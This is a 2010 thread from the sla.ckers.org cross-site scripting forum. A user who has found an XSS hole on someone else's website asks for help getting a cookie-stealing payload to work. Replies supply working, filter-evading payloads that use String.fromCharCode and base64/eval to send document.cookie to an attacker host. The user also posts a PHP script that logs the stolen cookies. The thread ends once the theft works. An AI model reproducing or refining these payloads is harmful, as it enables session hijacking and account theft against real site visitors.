Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Q and A for any cross site scripting information. Feel free to ask away. 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
{SOLVED] document.location behind URL?
Posted by: larsm99
Date: March 02, 2010 06:53AM

Hi guys,

I found a website with a xss vulnerability (for example: server.com). I inject the javascript in the index.php from a sub directory (for example: /test/). So the (POST) form is located at: www.server.com/test/index.php .
I want to inject the following script: <script>document.location="http://www.evilserver.com/c.php?c=" + document.cookie;</script>
Because the form has addslashes(), I encrypt the script into: <script>document.location=String.fromCharCode(34, 104, 116, 116, 112, 58, 47, 47, 119, 119, 119, 46, 101, 118, 105, 108, 115, 101, 114, 118, 101, 114, 46, 99, 111, 109, 47, 99, 46, 112, 104, 112, 63, 99, 61, 34, 32, 43, 32, 100, 111, 99, 117, 109, 101, 110, 116, 46, 99, 111, 111, 107, 105, 101);</script>
When I execute it, I don't get redirected to evilservers.com but to: www.server.com/test/"http://www.evilserver.com/c.php?c=" + document.cookie;
How can I fix it?
Btw: c.php is a cookie stealer who puts everything of variable "c" into a text file.

Thanks in advance!
larsm99



Edited 1 time(s). Last edit at 03/02/2010 11:22AM by larsm99.

Options: ReplyQuote
Re: document.location behind URL?
Posted by: PaPPy
Date: March 02, 2010 07:35AM

when using string.fromcharcode, you dont need encode the " (34) the javascript doesnt like it

http://www.xssed.com/archive/author=PaPPy/

Options: ReplyQuote
Re: document.location behind URL?
Posted by: larsm99
Date: March 02, 2010 08:35AM

Thank you for your reply.

It actually works (it redirects me) but now I have another problem: it doesn't write the actual cookie of the user to the script, but just "document.cookie".

The cause is (I think) that it redirects me to:
www.evilserver.com/c.php?c= + document.cookie
and not to:
www.evilserver.com/c.php?c=HERETHECOOKIE!

How to fix this?

Options: ReplyQuote
Re: document.location behind URL?
Posted by: PaPPy
Date: March 02, 2010 09:57AM

<script>document.location=String.fromCharCode(104, 116, 116, 112, 58, 47, 47, 119, 119, 119, 46, 101, 118, 105, 108, 115, 101, 114, 118, 101, 114, 46, 99, 111, 109, 47, 99, 46, 112, 104, 112, 63, 99, 61) + document.cookie;</script>

try that (if u are putting it in a url, may have to URL encode the plus sign)

or try + and then string.fromcharcode and then encode document.cookie

http://www.xssed.com/archive/author=PaPPy/

Options: ReplyQuote
Re: document.location behind URL?
Posted by: thornmaker
Date: March 02, 2010 09:59AM

N/M, do what Pappy said



Edited 1 time(s). Last edit at 03/02/2010 10:01AM by thornmaker.

Options: ReplyQuote
Re: document.location behind URL?
Posted by: larsm99
Date: March 02, 2010 10:18AM

Thanks for the fast replys, but it still doesn't work.
So, the following cases DON'T work:
1. Encoding URL and " + " and document.cookie
2. Encoding URL and document.cookie
3. Encoding URL only

In case 1: redirecting but it writes "document.cookie" to the file.
In case 2: no redirecting at all.
In case 3: redirecting but it writes "document.cookie" to the file.

Any more ideas? I don't get why it doesn't write the actual cookie.

BTW: This is my cookie stealer:
<?php
$cookie = $HTTP_GET_VARS["c"];
$file = fopen('COOKIEFILE.txt', 'a');
fwrite($file, $cookie . "\n\n");
?>
<script type="text/javascript">window.location="http://www.server.com/";</script>



Edited 1 time(s). Last edit at 03/02/2010 10:24AM by larsm99.

Options: ReplyQuote
Re: document.location behind URL?
Posted by: thornmaker
Date: March 02, 2010 10:42AM

did you URL encode the + ?

[edit:] or just use something like this:
location=eval(atob(unescape('J2h0dHA6Ly93d3cuZXZpbHNlcnZlci5jb20vYy5waHA%2fYz0nK2RvY3VtZW50LmNvb2tpZQ==')))



Edited 2 time(s). Last edit at 03/02/2010 10:53AM by thornmaker.

Options: ReplyQuote
Re: document.location behind URL?
Posted by: larsm99
Date: March 02, 2010 10:57AM

please look at my post before this one, I have tried all three cases mentioned there. So I also tried encoding the + ;)

@ your edit: That doesn't work because it uses addslashes(), so ' becomes \'



Edited 1 time(s). Last edit at 03/02/2010 10:59AM by larsm99.

Options: ReplyQuote
Re: document.location behind URL?
Posted by: PaPPy
Date: March 02, 2010 11:10AM

just tested this
<script>
document.location=String.fromCharCode(104,116,116,112,58,47,47,101,118,105,108,46,99,111,109) + document.cookie;
</script>

or this

<script>
var blah = String.fromCharCode(104,116,116,112,58,47,47,101,118,105,108,46,99,111,109) + document.cookie;
document.location=blah;
</script>

in firefox they work, not sure about ie. if u are trying to test local, it maybe not including ur cookies, as u dont have any...?

http://www.xssed.com/archive/author=PaPPy/

Options: ReplyQuote
Re: document.location behind URL?
Posted by: thornmaker
Date: March 02, 2010 11:13AM

can you post what you did for each of the 3 cases then because it's not clear what you did from your descriptions

edit: also, you never did the case: use String.fromCharCode on the URL... URL encode the + ... and do nothing to document.cookie.



Edited 1 time(s). Last edit at 03/02/2010 11:15AM by thornmaker.

Options: ReplyQuote
Re: document.location behind URL?
Posted by: larsm99
Date: March 02, 2010 11:22AM

Thankyou thornmaker and PaPPy!

It worked with using String.fromCharCode on the URL and URL encode on the + and nothing on document.cookie.

Ty!

Options: ReplyQuote
Re: {SOLVED] document.location behind URL?
Posted by: PaPPy
Date: March 02, 2010 11:54AM

*high 5's thornmaker* good job

just to explain a little about why you have to URL encode the + sign, hopefully people will search and we wont have to answer it again

in the URL bar, if you just place a + sign in it the browser/server interpret it as a space. but if you URL encode it to its equivalent %2B the browser/server will decode it correctly.

i cant remember if its the browser or the webserver. but u should at least understand why its happening

http://www.xssed.com/archive/author=PaPPy/

Options: ReplyQuote
Re: {SOLVED] document.location behind URL?
Posted by: lightos
Date: March 02, 2010 01:58PM

PaPPy Wrote:
-------------------------------------------------------
> i cant remember if its the browser or the
> webserver. but u should at least understand why
> its happening

The browser.

Options: ReplyQuote
Re: {SOLVED] document.location behind URL?
Posted by: PaPPy
Date: March 02, 2010 02:53PM

i knew it, i shouldnt have second guessed myself

http://www.xssed.com/archive/author=PaPPy/

Options: ReplyQuote


Sorry, only registered users may post in this forum.